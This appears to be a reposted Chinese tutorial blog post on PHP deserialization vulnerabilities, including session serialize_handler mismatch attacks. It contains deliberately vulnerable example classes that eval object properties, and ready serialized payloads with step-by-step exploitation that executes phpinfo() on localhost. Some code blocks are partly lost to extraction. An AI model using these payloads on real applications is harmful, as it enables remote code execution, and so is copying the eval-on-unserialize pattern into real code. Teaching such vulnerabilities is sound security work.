PHP反序列化漏洞

2023-04-12


【序列化简单利用】


serialize()序列化:使用函数serialize()可将实例序列化为字符串
unserialize()反序列化:使用函数unserialize()可将序列化的字符串还原


代码示例:






var);
    }
}
unserialize($_GET['code']);
?>





漏洞利用:


构造漏洞利用的代码,保存为test.php,获取序列化值为 O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}






var);
    }
}
$a=new Example();
echo serialize($a);
?>





提交?code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";} 即可执行phpinfo()



【PHP SESSION反序列化】


主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);


ini_set(‘session.serialize_handler’, ‘php’);


两者处理session的方式不同







//提交?a=1111





输出结果:
php_serialize: a:1:{s:4:"test";s:4:"1111";}
php: test|s:4:"1111";

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法
代码示例:
新建test1.php





hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>





新建test2.php









漏洞利用:


构造利用代码






hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
$a=new test();
echo serialize($a);

?>





获取反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}


步骤一:提交test2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},


传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}


步骤二:然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()


此时访问test1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value,然后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。



参考文章:


PHP反序列化漏洞 http://wyb0.com/posts/php-deserialization-vulnerabilities/



PHP中SESSION反序列化机制 https://blog.spoock.com/2016/10/16/php-serialize-problem/



















本文仅代表作者观点,版权归原创者所有,如需转载请在文中注明来源及作者名字。

免责声明:本文系转载编辑文章,仅作分享之用。如分享内容、图片侵犯到您的版权或非授权发布,请及时与我们联系进行审核处理或删除,您可以发送材料至邮箱:service@tojoy.com